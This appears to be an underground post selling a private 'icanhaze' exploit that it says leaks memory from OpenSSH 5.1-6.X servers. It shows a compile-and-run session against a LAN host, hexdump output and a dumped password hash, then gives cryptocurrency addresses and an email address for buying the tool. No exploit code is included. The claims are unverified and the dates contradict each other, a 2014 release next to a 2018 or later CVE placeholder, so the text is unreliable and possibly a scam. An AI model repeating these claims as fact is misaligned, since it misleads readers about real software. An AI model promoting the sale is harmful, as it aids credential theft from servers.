[EXPLOIT] OpenSSH 5.1-6.X - memory disclosure

1. #exploit #openssh
2. ░░░░░░ ▓▓▓▓▓▓
3. ░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓
4. ░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓
5. ░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
6. ░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
7. ░░░░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
8. ░░░░░░░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
9. ░░░░░░░░░░░░░░░░░░░░░░░░░█ ▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
10. ░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
11. ░░░░░░░░░░░░░░░░░░░░█████░░░░░░░░ ▓▓▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
12. ░░░░░░░░░░░░░░░░░▓▓▓█████░░░░░░ ▓▓▓▓▓▓▒▒▒▒▒░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
13. ░░░░░░░░░░░░█▓▓▓▓████░░░░░░░ ▓▓▓▓▓▓▓▒▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓
14. ░░░░░░░░░▓▓▓▓▓▓▓▓▓█░░░░░░ ▓▓▓▓▓▓▒░░░░░░░░▓▓▓▓▓▓▓▓▓▓
15. ░░░▓▓▓▓▓▓▓▓▓▓▓█░░░░░░ ▓▓▓▓▓▓▒░░░░░ ▓▓▓▓▓
16. ▓▓▓▓▓▓▓▓▓▓▓░░░░░░░ ▓▓▓▓▓▓▓░░ ░░░▓
17. ▓▓▓▓▓▓▓╔════════════════════════════════════╕░░░░░▓▓
18. ░░░░░░░░░║ OpenSSH sshd - memory leak │▓▓▓▓▓▓▓▓▓
19. ░░░░░░░░░░║ 5.1-6.X │▓▓▓▓▓▓▓▓▓▓
20. ░░░░░░░░░░░║ (priv8, still unfixed) │▓▓▓▓▓▓▓▓▓▓▓
21. ░░░░░░░ ╙────────────────────────────────────┘ ▓▓▓▓▓▓▓
22.  
23. u mad Heartbleed ? ...
24.  
25. ====
26. Release date: 04/30/2014
27. Product: OpenSSH
28. Vendor: http://www.openssh.com/
29. CVE candidate number: CVE-2018-XXXX (maybe 2020+...)
30. ====
31.  
32. We found two years ago a memory disclosure vulnerability in the OpenSSH server
33. which allows to remotely extract data from the sshd server's children processes
34. memory zones.
35.  
36. This vulnerability exploits a bad check on the network layer of the sshd server
37. that we trigger to retrieve all children processes memory sections thereby
38. allowing us to dump:
39. - system users hashes
40. - keys
41. - many random things ;)
42.  
43. This exploit was tested on:
44. - SSH-2.0-OpenSSH_5.1p1 Debian-5
45. - SSH-2.0-OpenSSH_5.1p1 DragonFly-20080927
46. - SSH-2.0-OpenSSH_5.2p1 FreeBSD-20090522
47. - SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3
48. - SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1
49. - SSH-2.0-OpenSSH_6.1p1 Debian-4
50. - SSH-2.0-OpenSSH_6.2p2-hpn13v14 FreeBSD-openssh-portable-6.2.p2_3,1
51. - SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
52. - SSH-2.0-OpenSSH_6.4p1 FreeBSD-openssh-portable-6.4.p1,1
53. - SSH-2.0-OpenSSH_6.5p1 CentOS RHEL
54. - SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
55. - ... many more
56.  
57. Enough bullshit, POC TIME !
58.  
59. =====
60.  
61. $> ls -lh
62. total 227K
63. drwxr-xr-x 2 vjn vjn 4.0K Apr 30 01:53 .
64. drwxrwxrwt 32 root root 4.0K Apr 30 01:53 ..
65. -rw-r--r-- 1 vjn vjn 236K Apr 30 01:53 icanhaze.c
66.  
67. $ sha1sum icanhaze.c
68. d7faeb46f10ea6b7058a116043c1f0ce7a158c7f icanhaze.c
69.  
70. $> gcc icanhaze.c -O3 -lcrypto -lopenbsd-compat -lssl -lssh -lpam -o icanhaze
71. $> ./icanhaze
72. +------------------------------+
73. | OpenSSH 5.1-6.X - infoleak |
74. | don't evar fuckin release it |
75. +------------------------------+
76.  
77. Usage: ./icanhaze [OPTIONS]
78. -h, --host <host>
79. Hostname or IP
80. -p, --port <port>
81. Port number (default: 22)
82. -d, --dump <dump_file>
83. Dump output file
84. -H, --hashes <hashes_file>
85. User hashes dump file (john)
86. -v, --verbose
87. Verbose mode
88. -D, --debug
89. Debug mode
90.  
91. Supported architectures: x86, x86_64, armv7
92. Supported operating systems: Linux, *BSD
93.  
94. $> ./icanhaze -v -h 192.168.10.5 -p 22 -d output.dump -H
95. +------------------------------+
96. | OpenSSH 5.1-6.X - infoleak |
97. | don't evar fuckin release it |
98. +------------------------------+
99. [I] - connecting to target 192.168.10.5 on port 22
100. [I] - sshd banner: SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
101. [I] - let magic happenz
102. [W] - bad luck... retrying
103. [W] - bad luck... retrying
104. [W] - bad luck... retrying
105. [W] - bad luck... retrying
106. [W] - bad luck... retrying
107. [W] - bad luck... retrying
108. [I] - ____STAGE_1____: OK
109. [I] - mode: x86_64
110. [I] - pointerz fuckery
111. [I] - ____STAGE_2____: OK
112. [I] - fingerprinted child sectionz table
113. 7f863100f000-7f8631010000
114. 7f8631213000-7f8631214000
115. 7f8631418000-7f8631419000
116. 7f863161b000-7f863161c000
117. 7f863181e000-7f863181f000
118. 7f8631a22000-7f8631a23000
119. 7f8631c68000-7f8631c69000
120. 7f8631e6b000-7f8631e6c000
121. 7f863206d000-7f863206e000
122. 7f8632272000-7f8632273000
123. 7f8632475000-7f8632476000
124. 7f863267a000-7f863267b000
125. 7f863287e000-7f863287f000
126. 7f8632a80000-7f8632a81000
127. 7f8632c82000-7f8632c83000
128. 7f8632e84000-7f8632e85000
129. 7f8633092000-7f8633093000
130. 7f8633093000-7f863309f000
131. 7f86332a4000-7f86332a5000
132. 7f86334b0000-7f86334b1000
133. 7f86336bb000-7f86336bc000
134. 7f86338c3000-7f86338c4000
135. 7f8633ad7000-7f8633ad8000
136. 7f8633ad8000-7f8633ada000
137. 7f8633cdd000-7f8633cde000
138. 7f8633ee6000-7f8633ee7000
139. 7f863410e000-7f863410f000
140. 7f863410f000-7f8634110000
141. 7f8634327000-7f8634328000
142. 7f8634328000-7f863432c000
143. 7f863452f000-7f8634530000
144. 7f8634745000-7f8634746000
145. 7f8634746000-7f8634748000
146. 7f8634acc000-7f8634acd000
147. 7f8634acd000-7f8634ad2000
148. 7f8634cd5000-7f8634cd6000
149. 7f8634fa8000-7f8634faa000
150. 7f86351e7000-7f86351e9000
151. 7f86353f1000-7f86353f2000
152. 7f86353f2000-7f8635420000
153. 7f8635636000-7f8635637000
154. 7f8635839000-7f863583a000
155. 7f8635a41000-7f8635a42000
156. 7f8635e13000-7f8635e22000
157. 7f8635e22000-7f8635e26000
158. 7f8636044000-7f8636045000
159. 7f8636045000-7f8636046000
160. 7f8636253000-7f8636254000
161. 7f863645d000-7f863645e000
162. 7f863645e000-7f863645f000
163. 7f863665c000-7f8636666000
164. 7f863667c000-7f863667e000
165. 7f863667f000-7f8636680000
166. 7f8636680000-7f8636681000
167. 7f863690b000-7f863690c000
168. 7f863690c000-7f8636915000
169. 7f86383de000-7f8638441000
170. 7fff42400000-7fff42421000
171. [I] - dumping (may take some time)
172. ................................/
173. ................................/
174. ................................/
175. ................................/
176. ................................/
177. ................................/
178. ................................/
179. ................................/
180. ................................/
181. ................................-
182. [I] - dump succeeded
183. [I] - raw result hexdump:
184. // cut
185. 000ae5f0 00 00 00 00 00 00 00 00 11 10 00 00 00 00 00 00 |................|
186. 000ae600 4c 69 6e 75 78 20 64 65 62 69 61 6e 2d 6d 61 73 |Linux debian-mas|
187. 000ae610 74 65 72 20 33 2e 31 31 2d 30 2e 62 70 6f 2e 32 |ter 3.11-0.bpo.2|
188. 000ae620 2d 61 6d 64 36 34 20 23 31 20 53 4d 50 20 44 65 |-amd64 #1 SMP De|
189. 000ae630 62 69 61 6e 20 33 2e 31 31 2e 31 30 2d 31 7e 62 |bian 3.11.10-1~b|
190. 000ae640 70 6f 37 30 2b 31 20 28 32 30 31 33 2d 31 32 2d |po70+1 (2013-12-|
191. 000ae650 31 37 29 20 78 38 36 5f 36 34 0a 0a 54 68 65 20 |17) x86_64..The |
192. 000ae660 70 72 6f 67 72 61 6d 73 20 69 6e 63 6c 75 64 65 |programs include|
193. 000ae670 64 20 77 69 74 68 20 74 68 65 20 44 65 62 69 61 |d with the Debia|
194. 000ae680 6e 20 47 4e 55 2f 4c 69 6e 75 78 20 73 79 73 74 |n GNU/Linux syst|
195. 000ae690 65 6d 20 61 72 65 20 66 72 65 65 20 73 6f 66 74 |em are free soft|
196. 000ae6a0 77 61 72 65 3b 0a 74 68 65 20 65 78 61 63 74 20 |ware;.the exact |
197. 000ae6b0 64 69 73 74 72 69 62 75 74 69 6f 6e 20 74 65 72 |distribution ter|
198. // cut
199. 000bcf10 63 68 61 72 6c 79 00 78 00 31 30 30 30 3a 31 30 |charly.x.1000:10|
200. 000bcf20 30 30 3a 43 68 61 72 6c 79 20 61 64 6d 69 6e 2c |00:Charly admin,|
201. 000bcf30 2c 2c 00 2f 68 6f 6d 65 2f 63 68 61 72 6c 79 00 |,,./home/charly.|
202. 000bcf40 2f 62 69 6e 2f 62 61 73 68 00 00 6f 65 00 2f 75 |/bin/bash..oe./u|
203. 000bcf50 73 72 2f 62 69 6e 2f 7a 73 68 00 00 73 65 00 00 |sr/bin/zsh..se..|
204. 000bcf60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
205. // cut
206. 000be690 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
207. 000be6a0 ff ff ff ff ff ff ff ff 63 68 61 72 6c 79 00 24 |........charly.$|
208. 000be6b0 36 24 6f 62 6f 67 44 58 78 79 24 73 34 4d 6b 55 |6$obogDXxy$s4MkU|
209. 000be6c0 4c 43 6b 4c 58 2e 66 55 41 35 76 63 70 53 2f 67 |LCkLX.fUA5vcpS/g|
210. 000be6d0 66 4f 30 65 6f 33 2e 42 47 45 48 56 43 4d 74 33 |fO0eo3.BGEHVCMt3|
211. 000be6e0 55 55 57 77 52 46 69 47 6b 7a 4d 52 48 78 53 64 |UUWwRFiGkzMRHxSd|
212. 000be6f0 53 47 45 4f 37 57 31 6a 34 69 64 55 2e 5a 55 55 |SGEO7W1j4idU.ZUU|
213. 000be700 77 62 30 6e 43 6a 44 63 46 64 77 36 32 6f 6c 59 |wb0nCjDcFdw62olY|
214. 000be710 2e 00 31 36 31 39 30 3a 30 3a 39 39 39 39 39 3a |..16190:0:99999:|
215. 000be720 37 3a 3a 3a 00 00 00 00 00 00 00 00 00 00 00 00 |7:::............|
216. 000bf0c0 61 31 2d 39 36 2d 65 74 6d 40 6f 70 65 6e 73 73 |a1-96-etm@openss|
217. 000bf0d0 68 2e 63 6f 6d 2c 68 6d 61 63 2d 6d 64 35 2d 39 |h.com,hmac-md5-9|
218. 000bf0e0 36 2d 65 74 6d 40 6f 70 65 6e 73 73 68 2e 63 6f |6-etm@openssh.co|
219. 000bf0f0 6d 2c 68 6d 61 63 2d 6d 64 35 2c 68 6d 61 63 2d |m,hmac-md5,hmac-|
220. 000bf100 73 68 61 31 2c 75 6d 61 63 2d 36 34 40 6f 70 65 |sha1,umac-64@ope|
221. 000bf110 6e 73 73 68 2e 63 6f 6d 2c 75 6d 61 63 2d 31 32 |nssh.com,umac-12|
222. 000bf120 38 40 6f 70 65 6e 73 73 68 2e 63 6f 6d 2c 68 6d |8@openssh.com,hm|
223. 000bf130 61 63 2d 73 68 61 32 2d 32 35 36 2c 68 6d 61 63 |ac-sha2-256,hmac|
224. // cut
225. 0024db80 35 33 20 33 61 20 36 35 20 20 7c 4c 41 4e 47 55 |53 3a 65 |LANGU|
226. 0024db90 41 47 45 3d 65 6e 5f 55 53 3a 65 7c 0a 30 30 30 |AGE=en_US:e|.000|
227. // cut
228. 002516d0 36 39 20 36 66 20 36 65 20 20 7c 65 73 73 69 6f |69 6f 6e |essio|
229. 002516e0 6e 29 3a 20 73 65 73 73 69 6f 6e 7c 0a 30 30 30 |n): session|.000|
230. 002516f0 63 32 61 33 30 20 20 32 30 20 36 66 20 37 30 20 |c2a30 20 6f 70 |
231. 00251700 36 35 20 36 65 20 36 35 20 36 34 20 32 30 20 20 |65 6e 65 64 20 |
232. 00251710 36 36 20 36 66 20 37 32 20 32 30 20 37 35 20 37 |66 6f 72 20 75 7|
233. 00251720 33 20 36 35 20 37 32 20 20 7c 20 6f 70 65 6e 65 |3 65 72 | opene|
234. 00251730 64 20 66 6f 72 20 75 73 65 72 7c 0a 30 30 30 63 |d for user|.000c|
235. // cut
236. 00251770 20 36 34 20 33 64 20 20 7c 20 63 68 61 72 6c 79 | 64 3d | charly|
237. 00251780 20 62 79 20 28 75 69 64 3d 7c 0a 30 30 30 63 32 | by (uid=|.000c2|
238. 00251790 61 35 30 20 20 33 30 20 32 39 20 30 30 20 30 30 |a50 30 29 00 00|
239. [I] - System users hashes (1):
240. charly:$6$obogDXxy$s4MkULCkLX.fUA5vcpS/gfO0eo3.BGEHVCMt3UUWwRFiGkzMRHxSdSGEO7W1j4idU.ZUUwb0nCjDcFdw62olY.:16190:0:99999:7:::
241. [I] - Done, exiting...
242.  
243. $>
244.  
245. =====
246. Since we detected few exploitations tentatives of this vulnerability through
247. our honeypots network, we concluded that an other team / organization
248. discovered it and decided to sell it.
249. (Yes, we build honeypots rules for our exploits)
250.  
251. We don't have access to exploit black markets and we are now happy to offering
252. it for sale to you both black and white hats.
253.  
254. == How to buy ==
255. Send 66666.6 BC (Blackcoin) to BLkrmaoY7XQfUUCSCJfHGq8tTig5qJmZXT
256. or
257. 2000000 WC (Whitecoin) to Wbi8SqBjymeedtNwM9zhaSm3bMnZvgifR2
258. or
259. 20 BTC (Bitcoin) to 14PEL35LQf81oCvSPurhoyTSvosvtQT7u3
260.  
261. then send your transaction ID by mail to olckrrii3@openmailbox.org and we will
262. send you the download link and password. (PGP recommended)
263.  
264. icanhaze.c sha1:d7faeb46f10ea6b7058a116043c1f0ce7a158c7f
265.  
266. Please note that we are busy and we will NOT answer to questions, social
267. engineering tentatives or dumb comments. Price is non-negotiable.
268. ==
269.  
270. Some teraoctets of custom pintools and ASAN traces give us many other
271. vulnerabities to dig and work to do, see you soon for some news about :
272. - BIND
273. - Nginx
274. - Apache HTTPd
275.  
276. . 1\-5\61\-J\48/a \~£\3|2\D6\ %%!%}).
277. R.